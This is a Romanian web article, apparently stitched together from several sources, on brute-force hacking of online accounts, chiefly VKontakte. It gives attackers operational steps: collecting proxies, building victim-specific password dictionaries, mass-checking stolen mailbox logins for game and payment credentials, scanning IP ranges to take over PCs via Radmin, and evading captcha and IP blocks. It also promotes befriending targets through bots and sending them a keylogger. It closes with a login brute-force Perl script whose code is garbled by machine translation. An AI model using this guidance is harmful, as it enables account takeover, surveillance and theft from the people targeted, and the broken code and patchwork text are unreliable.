Forța brută (derivată din expresia engleză: forța brută) este un tip de atac al hackerilor- o modalitate de a pirata conturi sisteme informatice, servicii de plată/bancare și pe site-uri web prin selectarea automată a combinațiilor de parole și autentificări.

Forța brută se bazează pe metoda matematică cu același nume (forța brută), în care soluția corectă - un număr finit sau o combinație simbolică se găsește prin enumerarea diverse opțiuni. De fapt, fiecare valoare dintr-un set dat de răspunsuri potențiale (soluții) este verificată pentru corectitudine.

Principiul funcționării forței brute

Hackerul scrie un program special pentru ghicirea parolelor sau folosește o soluție gata făcută a colegilor săi. Poate fi concentrat pe un anumit serviciu de e-mail, site web, rețea socială (adică, conceput pentru a pirata o anumită resursă). Următorul pas este pregătirea pentru hacking. Acesta constă din următorii pași:

1. Compilarea unei liste de proxy

Pentru a ascunde adevărata adresă IP a computerului de pe care va fi efectuat atacul și pentru a preveni blocarea site-ului unde este necesară piratarea contului, conexiunea la Internet este configurată printr-un server proxy.

Căutarea adreselor/porturilor proxy se efectuează în proxy grabber (Proxy Grabber). Acest utilitar extrage independent toate datele pentru conectarea la servere intermediare de pe site-urile care furnizează proxy (sunt specificate în listă). Cu alte cuvinte, proxy-ul este colectat.

Baza rezultată este salvată într-un fișier text separat. Și apoi toate adresele de server disponibile în acesta sunt verificate pentru operabilitate într-un verificator proxy. Destul de des, programele concepute pentru extragerea automată de proxy combină atât funcțiile unui grabber, cât și ale unui verificator.

Ca rezultat, obținem o listă de proxy finală sub forma unei liste de IP/porturi, salvată într-un fișier txt. (Veți avea nevoie de el când configurați programul de forță brută).

1. Baze de căutare pentru brute

Este necesar să conectați un dicționar la forța brută - un anumit set de combinații de parole și autentificare - pe care îl va înlocui în formularul de autentificare. De asemenea, ca și lista proxy, are forma unei liste într-un fișier text simplu (.txt). Dicționarele, sunt și baze de date, sunt distribuite prin forumuri de hackeri, site-uri și găzduire de fișiere. „Meșteri” mai experimentați le creează singuri și le oferă tuturor contra cost. Cu cât baza este mai mare (numărul de combinații, autentificări, conturi), cu atât mai bine (pentru un hacker) - cu atât este mai mare probabilitatea de succes a hackingului.

1. Configurare forță brută

Lista proxy este încărcată; programul de selecție va schimba automat proxy-ul astfel încât serverul web să nu detecteze atacul și, în consecință, sursa (gazdă) atacului.

Este conectat un dicționar de combinații de parolă/login. Numărul de fire este setat - câte combinații va verifica forța brută în același timp. Computer puternic cu o viteză mare a internetului, face față cu încredere la 120-200 de fluxuri (aceasta valoare optimă). Viteza brutei depinde direct de această setare. De exemplu, dacă setați doar 10 fire, selecția va fi foarte lentă.

1. Lansarea unei forțe brute

Programul captează încercările de hacking reușite: salvează conturile piratate (parolă/login) într-un fișier. Durata procedurii de selecție variază de la câteva ore la câteva zile. În același timp, nu se dovedește întotdeauna eficient din cauza stabilității criptografice ridicate a datelor de conectare sau a implementării altor măsuri de protecție din partea celui atacat.

Tipuri de forță brută

Hack personal

Vânătoare pentru un anumit cont - într-o rețea socială, pe un serviciu de e-mail etc. Prin sau în procesul de comunicare virtuală, atacatorul solicită o conectare de la victimă pentru a accesa un site. Apoi sparge parola folosind metoda brute-force: el specifică adresa resursei web și login-ul extras în forță brută, conectează dicționarul.

Șansele unui astfel de hack sunt scăzute, de exemplu, în comparație cu același atac XSS. Poate avea succes dacă proprietarul contului a folosit o parolă de 6-7 caractere cu o combinație simplă de caractere. În caz contrar, va dura ani - zeci și sute de ani, pe baza calculelor formulei de căutare matematică, pentru a „dezvolta” opțiuni mai stabile de 12.15, 20 de litere, cifre și caractere speciale.

Brutus/Check

O bază de date cu date de conectare/parole din cutiile poștale ale unui serviciu de e-mail (de exemplu, mail.ru) sau diferite este conectată la forța brută. Și o listă de proxy este folosită pentru a masca gazda (din moment ce, prin cereri multiple de la aceeași adresă IP, serviciile web de e-mail detectează rapid un atac).

Opțiunile brute includ o listă de cuvinte cheie (de obicei nume de site) - punctele de referință prin care va căuta datele de conectare pe cutiile poștale piratate (de exemplu: steampowered, worldoftanks, 4game, VK). Sau o anumită resursă de internet.

Utilizatorul, înregistrându-se într-un joc online, rețea socială sau forum, așa cum era de așteptat, își indică adresa de e-mail ( cutie poștală). Serviciul web trimite un mesaj la adresa specificată cu date de conectare și un link pentru a confirma înregistrarea. Aceste litere sunt pe care forța brută le caută pentru a extrage date de conectare și parole din ele.

Apăsați „START” și crackerul pornește forța brută. Funcționează conform următorului algoritm:

1. Încarcă datele de conectare/parola în e-mail din baza de date.
2. Verifică accesul, sau „verifică” (autorizează automat): dacă reușiți să vă autentificați în cont, plus unul în coloana bună (înseamnă că a fost găsit un alt email de lucru) și începeți să îl vizualizați (vezi paragrafele următoare); daca nu exista acces, il pune in bad (bads).
3. În toate „guds” (e-mailurile deschise), forța brută scanează scrisorile în funcție de cererea stabilită de hacker - adică caută login-uri / parole la site-urile și sistemele de plată specificate.
4. Când datele necesare sunt găsite, le copiază și le introduce într-un fișier separat.

Astfel, există o „deturpare” în masă a conturilor - de la zeci la sute. Atacatorul dispune la discreția sa de „trofeele” obținute - vânzare, schimb, colectare de date, furt de bani.

Hacking computer la distanță

Forța brută în combinație cu alte instrumente de hacking este folosită pentru a obține acces de la distanță la PC-ul protejat prin parolă al victimei printr-un canal de internet.

Acest tip de atac constă din următorii pași:

1. Se efectuează o căutare pentru rețele IP în care va fi efectuat un atac asupra computerelor utilizatorilor. Intervalele de adrese sunt preluate din baze de date speciale sau prin intermediul programe speciale, cum ar fi IP Geo. În acesta, puteți selecta rețele IP pentru un anumit județ, regiune și chiar oraș.
2. Intervalele IP selectate și dicționarele de selecție sunt setate în setările brute force Lamescan (sau echivalentul acestuia), destinate autentificarii de la distanță/parolă brute force. Odată lansat, Lamescan face următoarele:

• realizează o conexiune la fiecare IP din intervalul specificat;
• dupa stabilirea unei conexiuni, incearca sa se conecteze la gazda (PC) prin portul 4899 (dar pot exista si alte optiuni);
• dacă portul este deschis: încearcă să acceseze sistemul, forță brută când vi se solicită o parolă; dacă reușește, salvează adresa IP a gazdei (calculatorului) și informațiile de conectare în baza sa de date.

1. Hackerul lansează utilitarul Radmin, conceput pentru a gestiona computerele la distanță. Setează coordonatele de rețea ale victimei (IP, autentificare și parolă) și obține controlul deplin asupra sistemului - desktop (afișat vizual pe afișajul computerului cracker), directoare de fișiere, setări.

Programe pentru brute

HASHCAT

Pentru 2020 una dintre cele mai multe programe puternice pentru brut. Utilizează peste 200 de algoritmi de enumerare. Folosit pe scară largă pentru a sparge parolele WPA/WPA2, precum și parolele pentru documente MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Forța brută clasică, una dintre primele. Cu toate acestea, nu își pierde relevanța și concurează cu soluții noi. Are un algoritm inteligent de forță brută și acceptă toate protocoalele Internet majore - TCP / IP, POP3, HTTP etc. Poate falsifica cookie-uri. Brute cu un dicționar și generează parole pe cont propriu.

Puternic brute-checker. Echipat cu un arsenal extins de funcții pentru lucrul cu baze de date (verificare, sortare pe domenii). Sprijină Tipuri variate proxy, le verifică performanța. Scanează căsuțele poștale pentru setări precum data, cuvântul cheie, adresa, mesaje necitite. Pot descărca scrisori de pe Mail.ru și Yandex.

Brut VK - software care selectează în mod automat parolele pentru orice cont VKontakte. Numele complet al acestor aplicații este Brute force (brute force). Sunt concepute pentru a sparge profilurile unui utilizator de pe un site de rețea socială. Există destul de multe astfel de programe, dar cele mai multe dintre ele sunt absolut ineficiente. Cu toate acestea, cu utilitatea potrivită, veți obține oricare informații ascunse. Funcționalitatea de aici este destul de simplă și hacking-ul este ușor.

Ce este brut "VK"

Brutus este un software special care selectează parolele pentru autentificare tastând diverse combinații de litere și numere, e-mail etc. Dacă ați setat o parolă complexă, programul va dura mult timp să o ghicească și, în cele din urmă, este posibil să nu poată face față sarcinii. Rezultatul unei brute este în mare măsură influențat de cât de puternică este tehnica folosită pentru hacking și de stabilitatea conexiunii la Internet. Procesul de hacking poate dura câteva minute sau o zi întreagă. Dacă setați o parolă de mare complexitate, de exemplu: RKGJH4hKn2, este posibil ca software-ul special să nu o spargă deloc.

Ce este o bază

Pentru ca programul Bruteforce să funcționeze, trebuie să aibă date; dacă nu are de ales între coduri, nu va face nimic. Baza este un set de diferite combinații de coduri și autentificări. Dacă lista este uriașă, atunci mai devreme sau mai târziu îți vei sparge contul folosind aplicația. Combinațiile au cea mai mică lungime de trei litere și numere. Cel mai lung este de 16 caractere. Depinde de versiune software. Selectarea codului începe cu litera „A”, se termină cu ultima literă din alfabet. Literele pot fi ruse sau engleze. Acesta este principalul informatii utile despre bază.

Cine are nevoie

Toți utilizatorii au propriile lor motive pentru a pirata profilurile VK ale altor persoane. Cineva o face pentru distracție, alții vor să citească corespondența. De asemenea, unii doresc să trimită mesaje nevalide. Rețineți - Brut este ilegal. Va trebui mereu să răspunzi pentru furt. Este mai bine să nu faci asta. Orice cont piratat este ușor de recuperat. Mai ales dacă în timpul înregistrării au fost indicate informații reale. Este mai dificil cu profilurile create rapid, care indică date false, dar hackerii de obicei nu au nevoie de ele.

Furtul de informații din pagină rețea socială„VK” doar dacă este de interes pentru cineva. De obicei, hackerii vând conturi furate clienților în în număr mare. Aceștia le pot revândi proprietarilor, dacă există Informații importante. Hackerii încearcă întotdeauna să se protejeze și să folosească un server proxy. Cu el, nimeni nu le va observa, deoarece adresa IP va fi necunoscută.

Dacă doriți să vă protejați de intruși, faceți-vă parola lungă și complexă. Nu-l folosi pe al tău cont„VK” într-o rețea în care alte persoane au acces la un computer. De asemenea, nu salvați parola în browser, aceasta poate fi interceptată cu ușurință. Dacă ați primit un SMS pe telefon despre conectarea la profilul dvs. VK, dar nu ați făcut-o, schimbați-vă imediat parola. Încercați să o faceți cât mai repede posibil. Deci vă protejați de pierderea datelor personale importante.

Da este. În general, există multe astfel de programe.

Și suntem împotriva unor astfel de programe.

Dar, deoarece există o anumită cerere pentru astfel de programe, să aruncăm o privire la care dintre ele sunt „relativ” legale și care sunt mai bine să nu le folosiți deloc.
Inițial, există, chiar de la crearea VKontakte, de exemplu, programe precum aplicațiile de forță brută.
Astfel de programe sunt implicate în enumerarea tuturor parolelor care există. Pentru aceasta, atât algoritmii convenționali cu enumerare pas cu pas, cât și așa-numitul. Rainbow-tables, în care valorile sunt împrăștiate aleatoriu în funcție de cea mai bună distribuție - așa cum au fost concepute de autori ultimele programe, distribuția aleatorie poate reduce timpul de căutare a parolei, deoarece căutarea nu va merge de la bun început, ci aleatoriu, iar în medie calea către litera dorită va fi mai scurtă.
Nu recomandăm deloc utilizarea programelor de forță brută. Există o varietate de programe pentru piratarea VKontakte și, prin urmare, este mai bine să nu folosiți „pătrunderea” nepoliticosă în pagină, în plus, utilizatorul însuși poate suspecta ceva și poate șterge pagina pornind alta sau poate schimba adresa. Si pe langa, administrația VK vă va bloca prin IP și poate începe proceduri legale pentru atacarea serverelor de autentificare și încălcarea stabilității acestora, precum și încercarea de a pătrunde în corespondența altcuiva.

Deci, programele pentru piratarea VKontakte folosind forța brută sunt ilegale. Ce altceva mai sunt?

În general, veți avea întotdeauna timp să descărcați gratuit programul pentru hacking VKontakte. De fapt, sunt mulți dintre ei. Să ne uităm la care sunt modalitățile legale de a pătrunde în pagina altcuiva.
În primul rând, acestea sunt aplicații. Aplicațiile au o cantitate imensă de informații despre utilizator. De obicei, utilizatorii nu citesc solicitările care sunt emise înainte de lansarea aplicației. Și acolo, doar aplicației i se oferă acces deplin la date personale, o listă de prieteni, un perete și așa mai departe. Mesaje private, desigur, rămân neexplorate pentru aplicație, dar știind cantitatea colosală de informații personale care erau ascunse anterior în spatele setărilor de confidențialitate, puteți renunța la escrocherii de inginerie socială și vă puteți implica în „atragerea” de informații despre utilizator de la cei mai apropiați prieteni ai săi.
Cu toate acestea, nici acest lucru nu este în întregime legal - pot apărea probleme din cauza faptului că dacă utilizatorul ghici că a fost aplicația care a „scăpat” datele, apoi, bineînțeles, va depune plângere împotriva lui, iar aplicația va fi blocată.În general, metoda este bună, dar cade rapid sub suspiciune. da si a face o aplicație este încă o bătaie de cap.
Mergi mai departe.

De unde pot descărca în mod normal un program pentru hacking pagini VKontakte, care va fi legal?

În primul rând, să definim - ne mulțumim doar cu ingineria socială. În principiu, atunci când este folosită corect, ingineria socială ne va ajuta să obținem toate datele de care avem nevoie de la utilizator fără a-i sparge pagina. Deși puteți obține și acces complet la pagină.
Deci ce sunt programe sociale pentru hacking VKontakte, pe care îl puteți descărca gratuit?
În primul rând, este de remarcat botul Brobot.
Folosirea lui pentru hacking este, desigur, o metodă destul de ciudată de a gestiona acest program, dar, în principiu, funcționalitatea acolo este necesară și suficientă pentru hacking.
Putem „seta” bot-ul pe utilizator însuși, pe prietenii acestuia, folosind posibilitatea de a adăuga prieteni și corespondență personală. Să conectăm botul III pentru conversații, setându-l pe cel mai prietenos ton. Și după aceea, puteți deja să culegeți beneficiile, învățând o mulțime de lucruri interesante despre utilizator în istoria corespondenței pe care Brobot a salvat-o.
După aceea, puteți trimite utilizatorului, de exemplu, keylogger și prindeți ce le scrie altor utilizatori- de fapt, programe speciale pentru a pirata VKontakte, nu va trebui să descărcați după aceea. Va fi suficient doar să urmărești utilizatorul. Cu toate acestea, puteți face și fără un keylogger!

Cum ne pot ajuta programele de hacking VKontakte precum Brobot?

În primul rând, să definim ce Brobot nu pirata paginile. Toate activitățile noastre sunt absolut legale, nimeni nu ne va putea da în judecată, nimeni nu ne va putea bloca - totul este absolut corect (în măsura în care avem nevoie).
Doar, de fapt, începem mai multe pagini (Este mai bine să cumpărați nelimitat imediat, acest lucru este garantat pentru a crește cantitatea de informații obținute) și comunicăm deja cu utilizatorul de la ele, ceea ce ne permite să-i cunoaștem atitudinea față de o varietate de personalități, precum și să obținem un portret al lui însuși, al prietenilor săi, al rudelor sale și așa mai departe - și asta, în esență, este ceea ce avem nevoie.Și în viitor, puteți realiza acțiuni și mai interesante și mai complexe, iar aici totul depinde de dorințele și imaginația dvs.
Programul Brobot va deveni bunul tău asistent, iar echipa de asistență Brobot, disponibilă aproape non-stop, îți va răspunde la toate întrebările tehnice.

Brute force - forță brută, hacking cu forță brută
În articolul „” se spunea că este imposibil să piratați VK cu o forță brută (program).
Acest lucru nu este în întregime adevărat, există încă lacune...
Mai jos este un scenariu de lucru, dar mai întâi...

În partea de jos a articolului - un program gratuit pentru generarea unui dicționar brut și o listă de „parole de top lac”

Precizez dinainte că vorbim despre clasica „forță brută” fără algoritmi PBKDF2, fără a analiza hashing sha , deoarece La nivel de gospodărie, aceasta este o sarcină copleșitoare.

Există multe programe „pentru hacking VK prin forță brută” în rețea

Pe care să o aleg? Ce mă va ajuta (fără să-mi facă rău)?
- Nici unul

Fiecare cont VK necesită o abordare personală, iar programele șablon din rețea sunt toate prostii, divorțuri, prostii.

Acum vei înțelege de ce. Partea matematică pe scurt.

Lungimea minimă a unei parole VK este de 6 caractere.

Parola trebuie să conțină:
numerele(0-9 - 10 opțiuni),
scrisori(a-z - 26 în latină),
litere mari(A-Z este, de asemenea, 26)

Total pentru fiecare simbol - 10+26+26=62 (!) opțiuni, deci numărul de combinații pentru:
Parola de 6 caractere - 56.800.235.584 (56,8 miliarde)
Parola de 7 caractere - 3.521.614.606.208 (3,5 trilioane)
Parola de 8 caractere - 218 340 105 584 896 (218 trilioane)
Parola de 9 caractere -13 537 086 546 263 600

Nu știm lungimea parolei, așa că va trebui să brutăm un interval de cel puțin 6-8 caractere
Total: 6+7+8 caractere = 221.918.520.426.688 (222 trilioane) opțiuni

Să zicem că ai destul calculator bun, dar apare întrebarea - câte solicitări la serverul VK poate face?
Cât de repede este computerul tău de acasă?

Să calculăm. Pentru a face acest lucru, deschideți Linie de comanda(Start - Accesorii - Prompt de comandă sau rulați procesul cmd.exe)
Conducem în comandă, primim răspunsul serverului

„Răspuns de la .....time 134ms” (acesta este al meu, timpul dvs. poate diferi)

Timpul de ping este timpul necesar semnalul vine de la mașina noastră la server și înapoi

Există 1000 de milisecunde (ms) într-o secundă, deci
Rata de brute de la mașina dvs. (cereri / sec) va fi = 1000 / timp de răspuns
În cazul meu 1000/134ms = 7,4 solicitări (parolă) pe secundă

Cât timp va dura pentru a sorta parolele pentru VK?

Permiteți-mi să vă reamintesc că repetăm ​​peste 221.918.520.426.688 (222 trilioane) de opțiuni de parolă.

Prin urmare, pentru a afla cât de mult vom sparge parola VK prin forță brută, împărțim numărul la viteză, adică.

221918520426688 parole / 7,4 parole pe secundă = 29737081737176sec = 495618028953 min = 8260300483 ore = 344179187 zile = 942957 ani

Concluzie:un program real pentru hacking VK ar putea ridica o parolă prin forță brută timp de 94 de mii de ani.

Întrebare: Dar cum rămâne cu videoclipurile de pe YouTube, în care programele minune brutează pagina VK în câteva minute/ore?
Răspund: Aceasta este o înșelătorie creată pentru a vă infecta computerul pentru a vă fura propriile date. Nici mai mult nici mai puțin.

Puteți accelera semnificativ procesul de căutare!
Pentru asta ai nevoie de:
1. Boost putere de calcul. De exemplu, infectați 1.000.000 de computere ale altor persoane și, în același timp, eliminați VK brut de la toate (deja amuzant)
2. Scurtați dicționarul brut la, de exemplu, câteva mii (conform principiului ingineriei sociale)

Cum se face un dicționar brut?
1. Pixuri în programul Notepad (notepad.exe)
2. Prog „generator brut” (link în partea de jos a articolului)

Această brută - dicționarul este plin cu opțiuni reale.

Cele reale sunt cele care sunt cel puțin legate într-un fel cu persoana piratată:

-telefoane(el, rudele, prietenii lui)
Exemplu- numere cu + 7, 8, fără 8 - se întâlnesc rar

- datele de naștere(el, rudele lui, rudele)
Exemplu- (din aceeași dată) 010118, 01012018, 20180101, 180101 - întâlnește des

- Numele celor dragi
Exemplu- SashaMaria, MariaIvanova, SaNoMaIv - medie

Numele site-ului (sau numele de familie) pe un aspect diferit
Exemplu, dacă tastați cuvântul "vkontakte" pe aspectul rus, se va dovedi - "mlshtefleu" - o astfel de schemă se găsește foarte des pe toate site-urile.

- Lista Loch de parole pentru brute(lista celor mai comune parole din rețea - link la sfârșitul articolului)

Cât durează să scrii un dicționar? Ei bine, nu chiar - o jumătate de oră este suficientă pentru ochi. Cine a spus că va fi ușor?

Să presupunem că avem un dicționar creat de brute și un program de lucru pentru selectarea unei parole VK (sau introducerea manuală într-un dicționar).

Există o problemă importantă - sistemul de protecție a serverului.

De fapt, interferența sa constă în faptul că la solicitări prea dese, serverul îți blochează (temporar) IP-ul în mod prost. În plus, dacă lucrați cu VK prin formularul standard de introducere (HTML \ FORM), atunci după 3 încercări nereușite, VK vă va cere să introduceți un captcha.

LA versiune veche VK ar putea trece la versiunea mobilă - m.vk.com, acum versiune mobila ca atare, nu - în 2016 au realizat un singur design adaptiv.

Cum să ocoliți VKontakte captcha?

VK necesită introducerea captcha după 3 încercări nereușite (repornirea F5 nu ajută), dar de unde știe el asta esti tu faceți mai multe încercări de conectare?

Prin IP
- Cookie-uri, cache și JavaScript

Nu există probleme cu cookie-urile, memoria cache și JavaScript - le puteți dezactiva pur și simplu în setările browserului dvs.

IP-ul poate fi schimbat prin instalarea unui program pentru a schimba IP - nu este nimic complicat în asta, există o mulțime de ele în rețea (Google pentru a ajuta)

Poate fi utilizat browser TOR(cine nu știe - acesta este un browser pentru navigarea anonimă pe net, schimbă și adresele IP cu fiecare sesiune nouă, lucru util mai ales celor care navighează sau lucrează în SAR)

Dar aproape complet neagă toate încercările de a enumera GEOlocation.

Serverul VK își amintește unde (din punct de vedere geografic) a fost făcută ultima conectare.

Și dacă IP-ul tău este din altă localitate, atunci (eventual) va apărea o inscripție:

„Încercați să vă conectați ca Ivan Ivanov dintr-o locație neobișnuită.”

Pentru a confirma că sunteți într-adevăr proprietarul paginii, vă rugăm să furnizați toate cifrele lipsă ale numărului de telefon la care este legată pagina.

Script pentru formulare brute web (cum ar fi programul de hacking VK)

Important! Pe serverul VK există un script care urmărește frecvența de trimitere a pachetelor, de exemplu. dacă bateți cu ciocanul cu o viteză de N ori/sec, veți fi trimis automat în lista de interdicție prin IP.
VK folosește și GEOtracking.

Fără o IP dinamică, nu ar trebui să încercați, un VPN vă poate ajuta.
Personal, consider că parolele VK cu forță brută nu sunt promițătoare, dar pentru cunoscători voi posta un vechi script Pearl împrumutat de la 5p4x2knet a.k.a. Apocaliptice și puțin fixe.

Scriptul funcționează prin metoda POST cu doar doi parametri - Autentificareși parola.

Dacă autentificarea este cunoscută (de exemplu, un număr de telefon), atunci pur și simplu completați câmpurile corespunzătoare cu o valoare fără a utiliza un dicționar.

Câmpuri ascunse - captcha, scriptul nu va trimite imagini, ascunde sursa solicitărilor (dvs.) așa cum este descris mai sus.

Aici este util dicționarul brut pe care l-am compilat la începutul articolului. (Să-i spunem, de exemplu, brut.txt )

Avem nevoie și de un fișier din care programul nostru va primi informații.

Programul va forța brută toate scripturile specificate în acest fișier.( infa.txt). Dacă există un singur script, atunci puteți înlocui

Desigur, fișierul pentru înregistrarea rezultatelor ( rezultat.txt)

Asa de,
{
#conectare obiect
$usagent = LWP::UserAgent
#deschideți fișierul cu informații (dacă nu îl putem deschide, ieșiți);
# aruncați fișierul în matricea @infa și închideți-l. (dacă există un singur script, atunci acesta poate fi specificat imediat)
deschis(INFA, ";
aproape(INFA);
#dicționar brut deschis
deschis(BRUT, ";
aproape(BRUT);
#deschiderea fișierului cu rezultatele (se anexează la sfârșit).
deschide(REZULTAT, ">>$ARGV");
bucla #start
foreach $name (@infa)
{
#separate URL, autentificare, variabile și informații despre erori
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#show URL
printează „$url...n”;
# începe o altă buclă
foreach $brut (@brut)
{
#ucide spații și linii noi
$pss =~ s/ //;
$pss =~ s/n//;
#conectați un obiect nou
$usagent = LWP::UserAgent->new();
#creați interogări.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");
#și trimiterea
$rezultat = $utilizant -> cerere($req);
#scrie rezultate într-o variabilă
$res = $rezultat->conținut;
#dacă eșuează, este generat un mesaj de eroare
if($res!~ /$failed/i)
{
#output mesaj cu parola; înregistrarea rezultatelor;
print "brutword găsit. Este n$pssnn";
print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn";
#otherwise continuați selecția
ultimul;
}
}
}
#closing result.txt fișier
inchide(REZULTAT);